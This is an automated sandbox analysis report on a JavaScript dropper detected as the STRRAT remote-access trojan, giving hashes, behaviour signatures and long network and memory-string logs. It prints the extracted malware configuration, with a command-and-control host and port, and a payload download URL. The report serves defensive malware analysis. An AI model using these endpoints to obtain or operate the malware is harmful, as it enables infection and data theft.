Windows Analysis Report
LYDI9MoZyu.js

Overview

General Information

Sample name: LYDI9MoZyu.js
renamed because original name is a hash value
Original sample name: dd418fd6827cd6c3b3cda5f0b6f8e8e3b887d82b8ed51a3523475406e4850da7.js
Analysis ID: 1540037
MD5: 99fb9b2b5a775f8ea1ae9e4f8585d1dd
SHA1: 37bdbbe6608d8871de738c3ba3cf67dad8b71067
SHA256: dd418fd6827cd6c3b3cda5f0b6f8e8e3b887d82b8ed51a3523475406e4850da7
Tags: jsSTRRATuser-NDA0E
Infos:

Detection

STRRAT
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected STRRAT
JavaScript source code contains functionality to generate code involving a shell, file or stream
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected AllatoriJARObfuscator
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to query CPU information (cpuid)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
JavaScript source code contains large arrays or strings with random content potentially encoding malicious code
Queries the installed Java version
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection
barindex
Found malware configuration
Source: 00000000.00000002.2165270399.0000021CF9470000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: STRRAT {"C2 list": "harold.jetos.com:3608", "url": "http://jbfrost.live/strigoi/server/?hwid=1&lid=m&ht=5", "Proxy": "harold.jetos.com:3608", "lid": "khonsari", "Startup": "false", "Secondary Startup": "true", "Scheduled Task": "true"}
Multi AV Scanner detection for submitted file
Source: LYDI9MoZyu.js ReversingLabs: Detection: 15%
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49760 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49763 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49761 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49762 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49795 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49796 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49797 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49798 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49829 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49830 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49831 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49833 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58074 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58073 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58076 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:58078 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58107 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58105 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58106 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:58113 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58145 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58143 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58144 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:58151 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58178 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58175 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58177 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:58184 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58212 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58211 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58213 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:58220 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58227 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58225 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58226 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:58228 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58231 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58229 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58230 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:58232 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58233 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58234 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58235 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:58236 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58237 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58238 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58239 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:58240 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58241 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58242 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58243 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:58244 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58245 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58246 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58247 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:58248 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58249 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58251 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58250 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:58252 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58253 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58254 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58255 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:58256 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58257 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58258 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58259 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:58260 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58261 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58262 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58263 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:58264 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58265 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58267 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58266 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:58268 version: TLS 1.2

Software Vulnerabilities
barindex
JavaScript source code contains functionality to generate code involving a shell, file or stream
Source: LYDI9MoZyu.js Return value : ['"adodb.stream"'] Go to definition
Source: LYDI9MoZyu.js Return value : ['"adodb.stream"'] Go to definition
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 4x nop then cmp eax, dword ptr [ecx+04h] 2_2_02B7CB12
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 140.82.121.3 140.82.121.3
Source: Joe Sandbox View IP Address: 140.82.121.3 140.82.121.3
Source: Joe Sandbox View IP Address: 199.232.196.209 199.232.196.209
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 026e5ca865ce1f09da3a81d8a4e3effb
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: github.com
Source: global traffic DNS traffic detected: DNS query: repo1.maven.org
Source: global traffic DNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
Source: javaw.exe, 00000002.00000002.3431081605.000000000A169000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://bugreport.sun.com/bugreport/
Source: javaw.exe, 00000002.00000002.3431081605.000000000A195000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3431081605.000000000A1FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt
Source: javaw.exe, 00000002.00000003.2251900938.00000000156C5000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3431081605.000000000A195000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: javaw.exe, 00000002.00000002.3431081605.000000000A195000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3431081605.000000000A1FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt
Source: javaw.exe, 00000002.00000002.3431081605.000000000A169000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: javaw.exe, 00000002.00000002.3431081605.000000000A195000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3431081605.000000000A1FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
Source: javaw.exe, 00000002.00000002.3431081605.000000000A195000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: javaw.exe, 00000002.00000002.3431081605.000000000A3B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html
Source: javaw.exe, 00000002.00000002.3431081605.000000000A3B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: javaw.exe, 00000002.00000002.3431081605.000000000A3B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.chambersign.org/chambersroot.crl
Source: javaw.exe, 00000002.00000002.3431081605.000000000A3B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: javaw.exe, 00000002.00000002.3431081605.000000000A3B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl
Source: javaw.exe, 00000002.00000002.3431081605.000000000A3B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: javaw.exe, 00000002.00000002.3431081605.000000000A3B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.securetrust.com/STCA.crl
Source: javaw.exe, 00000002.00000002.3431081605.000000000A3B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: javaw.exe, 00000002.00000002.3431081605.000000000A3B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
Source: javaw.exe, 00000002.00000002.3431081605.000000000A3B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: javaw.exe, 00000002.00000002.3431081605.000000000A195000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3431081605.000000000A204000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl
Source: javaw.exe, 00000002.00000003.2251900938.00000000156C5000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3431081605.000000000A195000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: javaw.exe, 00000002.00000002.3431081605.000000000A195000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3431081605.000000000A204000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl
Source: javaw.exe, 00000002.00000002.3431081605.000000000A195000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3431081605.000000000A169000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: javaw.exe, 00000002.00000002.3431081605.000000000A20B000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3431081605.000000000A195000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl
Source: javaw.exe, 00000002.00000003.2251900938.00000000156C5000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3431081605.000000000A195000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: javaw.exe, 00000002.00000002.3431081605.000000000A195000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://java.oracle.com/
Source: javaw.exe, javaw.exe, 00000002.00000003.3365987618.0000000015716000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3435901831.0000000015716000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3431081605.000000000A315000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.2302876343.0000000015716000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.2354487164.0000000015716000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.2251900938.0000000015716000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://null.oracle.com/
Source: javaw.exe, 00000002.00000002.3431081605.000000000A1FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com
Source: javaw.exe, 00000002.00000002.3431081605.000000000A195000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: javaw.exe, 00000002.00000003.2251900938.00000000156C5000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3431081605.000000000A195000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: javaw.exe, 00000002.00000002.3431081605.000000000A195000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3431081605.000000000A169000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: javaw.exe, 00000002.00000002.3431081605.000000000A3B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://policy.camerfirma.com
Source: javaw.exe, 00000002.00000002.3431081605.000000000A3B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://policy.camerfirma.com0
Source: javaw.exe, 00000002.00000002.3431081605.000000000A3B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://repository.swisssign.com/
Source: javaw.exe, 00000002.00000002.3431081605.000000000A3B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://repository.swisssign.com/0
Source: wscript.exe, 00000000.00000003.2161127694.0000021CF85D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2162586305.0000021CF87AA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2163149681.00000073D2EF1000.00000004.00000010.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2163991093.0000021CF87AA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2164117427.0000021CF88EF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2160189849.0000021CF8787000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2159978751.0000021CF8956000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2160026915.0000021CF88EF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://wshsoft.company/jv/jrex.zip
Source: javaw.exe, 00000002.00000002.3431081605.000000000A195000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3431081605.000000000A163000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.allatori.com
Source: javaw.exe, 00000002.00000002.3431081605.000000000A596000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3431081605.000000000A3B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.chambersign.org
Source: javaw.exe, 00000002.00000002.3431081605.000000000A3B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.chambersign.org1
Source: javaw.exe, 00000002.00000002.3431081605.000000000A3B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.quovadis.bm
Source: javaw.exe, 00000002.00000002.3431081605.000000000A315000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3431081605.000000000A3B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.quovadis.bm0
Source: javaw.exe, 00000002.00000002.3431081605.000000000A3B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.quovadisglobal.com/cps
Source: javaw.exe, 00000002.00000002.3431081605.000000000A3B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: javaw.exe, 00000002.00000002.3429709627.0000000004F57000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3429709627.0000000004EBD000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3429709627.0000000004C8A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3429709627.0000000004C1A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3429709627.0000000004E04000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3429709627.0000000004D49000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com
Source: javaw.exe, 00000002.00000002.3429709627.0000000004D49000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/kristian/system-hook/releases/download/3.5/system-hook-3.5.jar
Source: javaw.exe, 00000002.00000002.3431081605.000000000A3B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ocsp.quovadisoffshore.com
Source: javaw.exe, 00000002.00000002.3431081605.000000000A315000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3431081605.000000000A3B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: javaw.exe, 00000002.00000002.3429709627.0000000004F57000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3429709627.0000000004FA6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3429709627.0000000004D72000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3429709627.0000000004C08000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3429709627.0000000004E2C000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3429709627.0000000004CB2000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3429709627.0000000004CE1000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3429709627.0000000004C1A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3429709627.0000000004EEF000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3429709627.0000000004D9B000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3429709627.0000000004F84000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://repo1.maven.org
Source: javaw.exe, 00000002.00000002.3429709627.0000000004FA6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3429709627.0000000004EEF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://repo1.maven.org/ma
Source: javaw.exe, 00000002.00000002.3429709627.0000000004D9B000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3429709627.0000000004F84000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://repo1.maven.org/maven2/net/java/dev/jna/jna-platform/5.5.0/jna-platform-5.5.0.jar
Source: javaw.exe, 00000002.00000002.3429709627.0000000004D9B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://repo1.maven.org/maven2/net/java/dev/jna/jna/5.5.0/jna-5.5.0.jar
Source: javaw.exe, 00000002.00000002.3429709627.0000000004D9B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://repo1.maven.org/maven2/org/xerial/sqlite-jdbc/3.14.2.1/sqlite-jdbc-3.14.2.1.jar
Source: javaw.exe, 00000002.00000002.3431081605.000000000A3B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://repository.luxtrust.lu
Source: javaw.exe, 00000002.00000002.3431081605.000000000A3B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://repository.luxtrust.lu0
Source: unknown Network traffic detected: HTTP traffic on port 58220 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58243 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58257 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58225
Source: unknown Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58211 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58220
Source: unknown Network traffic detected: HTTP traffic on port 58234 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58263 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58184
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58177 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58246 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58225 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58252 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58143 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58106
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58227
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58105
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58226
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58229
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58107
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58228
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58113
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58234
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58233
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58236
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58235
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58076
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58230
Source: unknown Network traffic detected: HTTP traffic on port 58231 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58078
Source: unknown Network traffic detected: HTTP traffic on port 58105 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58228 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58232
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58231
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58074
Source: unknown Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58249 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58073
Source: unknown Network traffic detected: HTTP traffic on port 58266 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58113 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58245 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58268 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58226 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58251 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58107 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58238
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58237
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58239
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58245
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58244
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58247
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58246
Source: unknown Network traffic detected: HTTP traffic on port 58259 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58241
Source: unknown Network traffic detected: HTTP traffic on port 58229 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58240
Source: unknown Network traffic detected: HTTP traffic on port 58232 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58243
Source: unknown Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58242
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown Network traffic detected: HTTP traffic on port 58265 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown Network traffic detected: HTTP traffic on port 58175 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58078 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49798
